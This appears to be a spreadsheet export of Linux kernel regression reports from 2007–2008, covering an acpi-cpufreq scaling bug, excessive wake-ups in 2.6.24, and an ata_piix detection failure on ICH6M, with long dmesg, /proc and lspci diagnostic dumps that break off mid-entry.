    <t>Most recent kernel where this bug did not occur: unknown Distribution: Debian Hardware Environment: Fujitsu-Siemens Lifebook E8410 with Core2Duo@2.4GHz Software Environment: single-user mode Problem Description: when loading acpi-cpufreq (with no other daemons running), the system will reduce CPU frequency, but never increase it, probably due to wrong _PPC values Steps to reproduce: boot into single-user mode, load acpi-cpufreq, change governor to 'ondemand' =&gt; cpu frequency will step down to 800 MHz, but will never be increased again (not even under heavy load). Adding a debug patch from http://article.gmane.org/gmane.linux.kernel.cpufreq/5642 shows that _PPC values increase as P-states are entered.</t>
  </si>
  <si>
    <t>20000+ wake-ups/second in 2.6.24</t>
  </si>
  <si>
    <t>2007-12-02 04:23 UTC</t>
  </si>
  <si>
    <t>2008-08-20 03:52 UTC</t>
  </si>
  <si>
    <t>Subject : 20000+ wake-ups/second in 2.6.24 Submitter : Mark Lord &lt;lkml@rtr.ca&gt; References : http://lkml.org/lkml/2007/12/1/141 Handled-By : Arjan van de Ven &lt;arjan@infradead.org&gt;</t>
  </si>
  <si>
    <t>ata_piix fails to detect device on ICH6M</t>
  </si>
  <si>
    <t>2007-12-02 10:10 UTC</t>
  </si>
  <si>
    <t>Robert M. Albrecht</t>
  </si>
  <si>
    <t>2008-11-02 01:10 UTC</t>
  </si>
  <si>
    <t>http://bugzilla.kernel.org/show_bug.cgi?id=8933 from a running system with manual driver loading&gt; from dmesg libata version 3.00 loaded. ahci 0000:00:1f.2: version 3.0 ACPI: PCI Interrupt 0000:00:1f.2[B] -&gt; GSI 19 (level, low) -&gt; IRQ 20 ahci 0000:00:1f.2: nr_ports (4) and implemented port map (0x5) don't match, using nr_ports ahci 0000:00:1f.2: forcing PORTS_IMPL to 0xf usb 2-1: new full speed USB device using uhci_hcd and address 2 usb 2-1: configuration #1 chosen from 1 choice usb 5-2: new full speed USB device using uhci_hcd and address 2 ahci 0000:00:1f.2: AHCI 0001.0000 32 slots 4 ports 1.5 Gbps 0xf impl SATA mode ahci 0000:00:1f.2: flags: 64bit ncq ilck pm led slum part PCI: Setting latency timer of device 0000:00:1f.2 to 64 scsi0 : ahci scsi1 : ahci scsi2 : ahci scsi3 : ahci ata1: SATA max UDMA/133 abar m1024@0xcdbffc00 port 0xcdbffd00 irq 20 ata2: SATA max UDMA/133 abar m1024@0xcdbffc00 port 0xcdbffd80 irq 20 ata3: SATA max UDMA/133 abar m1024@0xcdbffc00 port 0xcdbffe00 irq 20 ata4: SATA max UDMA/133 abar m1024@0xcdbffc00 port 0xcdbffe80 irq 20 usb 5-2: configuration #1 chosen from 1 choice usb 1-3.4: new low speed USB device using ehci_hcd and address 5 usb 1-3.4: configuration #1 chosen from 1 choice input: Microsoft Microsoft IntelliMouse� Explorer as /class/input/input4 input,hidraw0: USB HID v1.11 Mouse [Microsoft Microsoft IntelliMouse� Explorer] on usb-0000:00:1d.7-3.4 ata1: SATA link up 1.5 Gbps (SStatus 113 SControl 300) ata1.00: ATA-7: HTS541060G9SA00, MB3OC60R, max UDMA/100 ata1.00: 117210240 sectors, multi 0: LBA48 NCQ (depth 31/32) ata1.00: configured for UDMA/100 ata2: SATA link down (SStatus 0 SControl 0) ata3: SATA link down (SStatus 0 SControl 300) ata4: SATA link down (SStatus 0 SControl 0) scsi 0:0:0:0: Direct-Access ATA HTS541060G9SA00 MB3O PQ: 0 ANSI: 5 sd 0:0:0:0: [sda] 117210240 512-byte hardware sectors (60012 MB) sd 0:0:0:0: [sda] Write Protect is off sd 0:0:0:0: [sda] Mode Sense: 00 3a 00 00 sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA sd 0:0:0:0: [sda] 117210240 512-byte hardware sectors (60012 MB) sd 0:0:0:0: [sda] Write Protect is off sd 0:0:0:0: [sda] Mode Sense: 00 3a 00 00 sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA sda: sda1 sda2 sda3 sd 0:0:0:0: [sda] Attached SCSI disk insmod used greatest stack depth: 596 bytes left ata_piix 0000:00:1f.1: version 2.12 ACPI: PCI Interrupt 0000:00:1f.1[A] -&gt; GSI 18 (level, low) -&gt; IRQ 21 PCI: Setting latency timer of device 0000:00:1f.1 to 64 scsi4 : ata_piix scsi5 : ata_piix ata5: PATA max UDMA/100 cmd 0x1f0 ctl 0x3f6 bmdma 0xaf10 irq 14 ata6: PATA max UDMA/100 cmd 0x170 ctl 0x376 bmdma 0xaf18 irq 15 ata5.00: ATAPI: MATSHITADVD-RAM UJ-832S, 1.00, max UDMA/33 ata5.00: configured for UDMA/33 ata6: port disabled. ignoring. scsi 4:0:0:0: CD-ROM MATSHITA DVD-RAM UJ-832S 1.00 PQ: 0 ANSI: 5 kjournald starting. Commit interval 5 seconds EXT3-fs: mounted filesystem with ordered data mode. SELinux: Disabled at runtime. SELinux: Unregistering netfilter hooks audit(1196617527.614:2): selinux=0 auid=4294967295 sr0: scsi3-mmc drive: 24x/24x writer dvd-ram cd/rw xa/form2 cdda tray Uniform CD-ROM driver Revision: 3.20 sr 4:0:0:0: Attached scsi CD-ROM sr0 sd 0:0:0:0: Attached scsi generic sg0 type 0 sr 4:0:0:0: Attached scsi generic sg1 type 5 [romal@helios proc]$ cat ioports 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 004e-004f : tpm_infineon0 0050-0053 : timer1 0060-006f : keyboard 0070-0077 : rtc 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0140-0147 : pcmcia_socket0 0170-0177 : 0000:00:1f.1 0170-0177 : libata 01f0-01f7 : 0000:00:1f.1 01f0-01f7 : libata 0376-0376 : 0000:00:1f.1 0376-0376 : libata 03c0-03df : vga+ 03f6-03f6 : 0000:00:1f.1 03f6-03f6 : libata 03f8-03ff : serial 0480-048f : pnp 00:09 0680-068f : tpm_infineon0 0cf8-0cff : PCI conf1 1000-10ff : PCI CardBus #06 1400-14ff : PCI CardBus #06 aee0-aeef : 0000:00:1f.2 aef4-aef7 : 0000:00:1f.2 aef8-aeff : 0000:00:1f.2 af04-af07 : 0000:00:1f.2 af08-af0f : 0000:00:1f.2 af10-af1f : 0000:00:1f.1 af10-af1f : libata af40-af5f : 0000:00:1d.3 af40-af5f : uhci_hcd af60-af7f : 0000:00:1d.2 af60-af7f : uhci_hcd af80-af9f : 0000:00:1d.1 af80-af9f : uhci_hcd afe0-afff : 0000:00:1d.0 afe0-afff : uhci_hcd b000-bfff : PCI Bus #03 c000-cfff : PCI Bus #02 ce00-ceff : 0000:02:00.0 ce00-ceff : sky2 d800-d87f : 0000:00:1f.0 d800-d803 : ACPI PM1a_EVT_BLK d804-d805 : ACPI PM1a_CNT_BLK d808-d80b : ACPI PM_TMR d810-d815 : ACPI CPU throttle d820-d820 : ACPI PM2_CNT_BLK d828-d82f : ACPI GPE0_BLK d860-d87f : iTCO_wdt eec0-eeff : 0000:00:1f.0 [romal@helios proc]$ [romal@helios proc]$ cat ioports 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 004e-004f : tpm_infineon0 0050-0053 : timer1 0060-006f : keyboard 0070-0077 : rtc 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0140-0147 : pcmcia_socket0 0170-0177 : 0000:00:1f.1 0170-0177 : libata 01f0-01f7 : 0000:00:1f.1 01f0-01f7 : libata 0376-0376 : 0000:00:1f.1 0376-0376 : libata 03c0-03df : vga+ 03f6-03f6 : 0000:00:1f.1 03f6-03f6 : libata 03f8-03ff : serial 0480-048f : pnp 00:09 0680-068f : tpm_infineon0 0cf8-0cff : PCI conf1 1000-10ff : PCI CardBus #06 1400-14ff : PCI CardBus #06 aee0-aeef : 0000:00:1f.2 aef4-aef7 : 0000:00:1f.2 aef8-aeff : 0000:00:1f.2 af04-af07 : 0000:00:1f.2 af08-af0f : 0000:00:1f.2 af10-af1f : 0000:00:1f.1 af10-af1f : libata af40-af5f : 0000:00:1d.3 af40-af5f : uhci_hcd af60-af7f : 0000:00:1d.2 af60-af7f : uhci_hcd af80-af9f : 0000:00:1d.1 af80-af9f : uhci_hcd afe0-afff : 0000:00:1d.0 afe0-afff : uhci_hcd b000-bfff : PCI Bus #03 c000-cfff : PCI Bus #02 ce00-ceff : 0000:02:00.0 ce00-ceff : sky2 d800-d87f : 0000:00:1f.0 d800-d803 : ACPI PM1a_EVT_BLK d804-d805 : ACPI PM1a_CNT_BLK d808-d80b : ACPI PM_TMR d810-d815 : ACPI CPU throttle d820-d820 : ACPI PM2_CNT_BLK d828-d82f : ACPI GPE0_BLK d860-d87f : iTCO_wdt eec0-eeff : 0000:00:1f.0 [romal@helios proc]$ cat iomem 00000000-0009dfff : System RAM 0009e000-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000cffff : Video ROM 000d4000-000dbfff : Adapter ROM 000e0000-000eedff : reserved 000eee00-000eefff : ACPI Non-volatile Storage 000f0000-000fffff : System ROM 00100000-7ff6ffff : System RAM 00400000-006450cb : Kernel code 006450cc-0076d923 : Kernel data 00803000-00abff23 : Kernel bss 7ff70000-7fffffff : reserved 88000000-88003fff : 0000:00:1b.0 88000000-88003fff : ICH HD audio 88004000-880043ff : 0000:00:1d.7 88004000-880043ff : ehci_hcd 8c000000-8fffffff : PCI CardBus #06 90000000-93ffffff : PCI CardBus #06 afe00000-afffffff : PCI Bus #03 b0000000-bfffffff : PCI Bus #01 b0000000-bfffffff : 0000:01:00.0 cdbffc00-cdbfffff : 0000:00:1f.2 cdbffc00-cdbfffff : ahci cdc00000-cdcfffff : PCI Bus #05 cdc00000-cdc03fff : 0000:05:0b.2 cdc04000-cdc04fff : 0000:05:0b.0 cdc04000-cdc04fff : yenta_socket cdc05000-cdc057ff : 0000:05:0b.2 cdc05000-cdc057ff : firewire_ohci cdc05800-cdc058ff : 0000:05:0b.4 cdc05800-cdc058ff : sdhci:slot0 cdc05900-cdc059ff : 0000:05:0b.4 cdc05900-cdc059ff : sdhci:slot1 cdc05a00-cdc05aff : 0000:05:0b.4 cdc05a00-cdc05aff : sdhci:slot2 cdc10000-cdc10fff : pcmcia_socket0 cdcff000-cdcfffff : 0000:05:05.0 cdcff000-cdcfffff : ipw2200 cdd00000-cdefffff : PCI Bus #03 cdf00000-cdffffff : PCI Bus #02 cdffc000-cdffffff : 0000:02:00.0 cdffc000-cdffffff : sky2 ce000000-cfffffff : PCI Bus #01 ce000000-ceffffff : 0000:01:00.0 cf000000-cfffffff : 0000:01:00.0 e0000000-efffffff : pnp 00:01 f0000000-f0005fff : reserved f0008000-f000bfff : reserved fec00000-fecfffff : reserved fed13000-fed13fff : reserved fed20000-fed8ffff : reserved feda0000-fedbffff : reserved fee00000-feefffff : reserved ffb00000-ffbfffff : reserved ffe80000-ffffffff : reserved [romal@helios proc]$ fec00000-fecfffff : reserved fed13000-fed13fff : reserved fed20000-fed8ffff : reserved feda0000-fedbffff : reserved fee00000-feefffff : reserved ffb00000-ffbfffff : reserved ffe80000-ffffffff : reserved [romal@helios proc]$ [root@helios ~]# lspci -nnvvv 00:00.0 Host bridge [0600]: Intel Corporation Mobile 915GM/PM/GMS/910GML Express Processor to DRAM Controller [8086:2590] (rev 03) Subsystem: Toshiba America Info Systems Unknown device [1179:0001] Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: [e0] Vendor Specific Information &lt;?&gt; 00:01.0 PCI bridge [0604]: Intel Corporation Mobile 915GM/PM Express PCI Express Root Port [8086:2591] (rev 03) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 32 bytes Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000f000-00000fff Memory behind bridge: ce000000-cfffffff Prefetchable memory behind bridge: b0000000-bfffffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA+ MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [88] Subsystem: Toshiba America Info Systems Unknown device [1179:0001] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [90] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable+ Address: fee0100c Data: 41c1 Capabilities: [a0] Express (v1) Root Port (Slot-), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE- FLReset- DevCtl: Report errors: Correctable+ Non-Fatal+ Fatal+ Unsupported+ RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr+ UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend- LnkCap: Port #2, Speed 2.5GT/s, Width x16, ASPM L0s L1, Latency L0 &lt;256ns, L1 &lt;4us ClockPM- Suprise- LLActRep- BwNot- LnkCtl: ASPM L0s L1 Enabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x16, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Kernel driver in use: pcieport-driver 00:1b.0 Audio device [0403]: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) High Definition Audio Controller [8086:2668] (rev 03) Subsystem: Toshiba America Info Systems Unknown device [1179:0001] Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 16 Region 0: Memory at 88000000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=55mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [60] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable- Address: 0000000000000000 Data: 0000 Capabilities: [70] Express (v1) Root Complex Integrated Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE- FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop+ MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #0, Speed unknown, Width x0, ASPM unknown, Latency L0 &lt;64ns, L1 &lt;1us ClockPM- Suprise- LLActRep- BwNot- LnkCtl: ASPM Disabled; Disabled- Retrain- CommClk- ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed unknown, Width x0, TrErr- Train- SlotClk- DLActive- BWMgmt- ABWMgmt- Kernel driver in use: HDA Intel Kernel modules: snd-hda-intel 00:1c.0 PCI bridge [0604]: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 1 [8086:2660] (rev 03) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 32 bytes Bus: primary=00, secondary=02, subordinate=02, sec-latency=0 I/O behind bridge: 0000c000-0000cfff Memory behind bridge: cdf00000-cdffffff Prefetchable memory behind bridge: 00000000fff00000-00000000000fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Express (v1) Root Port (Slot-), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s unlimited, L1 unlimited ExtTag+ RBE- FLReset- DevCtl: Report errors: Correctable+ Non-Fatal+ Fatal+ Unsupported+ RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #1, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;256ns, L1 &lt;4us ClockPM- Suprise- LLActRep- BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [80] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable+ Address: fee0100c Data: 41c9 Capabilities: [90] Subsystem: Toshiba America Info Systems Unknown device [1179:0001] Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: pcieport-driver 00:1c.1 PCI bridge [0604]: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 2 [8086:2662] (rev 03) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 32 bytes Bus: primary=00, secondary=03, subordinate=04, sec-latency=0 I/O behind bridge: 0000b000-0000bfff Memory behind bridge: cdd00000-cdefffff Prefetchable memory behind bridge: 00000000afe00000-00000000afffffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s unlimited, L1 unlimited ExtTag+ RBE- FLReset- DevCtl: Report errors: Correctable+ Non-Fatal+ Fatal+ Unsupported+ RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #2, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;1us, L1 &lt;4us ClockPM- Suprise- LLActRep- BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk- ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x0, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug+ Surpise+ Slot # 1, PowerLimit 6.500000; Interlock- NoCompl- SltCtl: Enable: AttnBtn+ PwrFlt- MRL- PresDet+ CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet- Interlock- Changed: MRL- PresDet- LinkState- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [80] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable+ Address: fee0100c Data: 41d1 Capabilities: [90] Subsystem: Toshiba America Info Systems Unknown device [1179:0001] Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: pcieport-driver 00:1d.0 USB Controller [0c03]: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #1 [8086:2658] (rev 03) (prog-if 00 [UHCI]) Subsystem: Toshiba America Info Systems Unknown device [1179:0001] Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 19 Region 4: I/O ports at afe0 [size=32] Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:1d.1 USB Controller [0c03]: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #2 [8086:2659] (rev 03) (prog-if 00 [UHCI]) Subsystem: Toshiba America Info Systems Unknown device [1179:0001] Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin B routed to IRQ 20 Region 4: I/O ports at af80 [size=32] Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:1d.2 USB Controller [0c03]: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #3 [8086:265a] (rev 03) (prog-if 00 [UHCI]) Subsystem: Toshiba America Info Systems Unknown device [1179:0001] Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin C routed to IRQ 21 Region 4: I/O ports at af60 [size=32] Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:1d.3 USB Controller [0c03]: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #4 [8086:265b] (rev 03) (prog-if 00 [UHCI]) Subsystem: Toshiba America Info Systems Unknown device [1179:0001] Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin D routed to IRQ 16 Region 4: I/O ports at af40 [size=32] Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:1d.7 USB Controller [0c03]: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB2 EHCI Controller [8086:265c] (rev 03) (prog-if 20 [EHCI]) Subsystem: Toshiba America Info Systems Unknown device [1179:0001] Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 19 Region 0: Memory at 88004000 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Debug port: BAR=1 offset=00a0 Kernel driver in use: ehci_hcd Kernel modules: ehci-hcd 00:1e.0 PCI bridge [0604]: Intel Corporation 82801 Mobile PCI Bridge [8086:2448] (rev d3) (prog-if 01 [Subtractive decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Bus: primary=00, secondary=05, subordinate=07, sec-latency=32 I/O behind bridge: 0000f000-00000fff Memory behind bridge: cdc00000-cdcfffff Prefetchable memory behind bridge: 00000000fff00000-00000000000fffff Secondary status: 66MHz- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [50] Subsystem: Toshiba America Info Systems Unknown device [1179:0001] 00:1f.0 ISA bridge [0601]: Intel Corporation 82801FBM (ICH6M) LPC Interface Bridge [8086:2641] (rev 03) Subsystem: Toshiba America Info Systems Unknown device [1179:0001] Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Kernel modules: intel-rng, iTCO_wdt 00:1f.1 IDE interface [0101]: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) IDE Controller [8086:266f] (rev 03) (prog-if 8a [Master SecP PriP]) Subsystem: Toshiba America Info Systems Unknown device [1179:0001] Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 21 Region 0: I/O ports at 01f0 [size=8] Region 1: I/O ports at 03f4 [size=1] Region 2: I/O ports at 0170 [size=8] Region 3: I/O ports at 0374 [size=1] Region 4: I/O ports at af10 [size=16] Kernel driver in use: ata_piix Kernel modules: ata_piix 00:1f.2 SATA controller [0106]: Intel Corporation 82801FBM (ICH6M) SATA Controller [8086:2653] (rev 03) (prog-if 01 [AHCI 1.0]) Subsystem: Toshiba America Info Systems Unknown device [1179:0f00] Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin B routed to IRQ 20 Region 0: I/O ports at af08 [size=8] Region 1: I/O ports at af04 [size=4] Region 2: I/O ports at aef8 [size=8] Region 3: I/O ports at aef4 [size=4] Region 4: I/O ports at aee0 [size=16] Region 5: Memory at cdbffc00 (32-bit, non-prefetchable) [size=1K] Capabilities: [70] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: ahci Kernel modules: ata_piix, ahci 01:00.0 VGA compatible controller [0300]: nVidia Corporation NV43 [GeForce Go 6600] [10de:0148] (rev a2) (prog-if 00 [VGA]) Subsystem: Toshiba America Info Systems Unknown device [1179:0010] Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 10 Region 0: Memory at cf000000 (32-bit, non-prefetchable) [size=16M] Region 1: Memory at b0000000 (64-bit, prefetchable) [size=256M] Region 3: Memory at ce000000 (64-bit, non-prefetchable) [size=16M] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 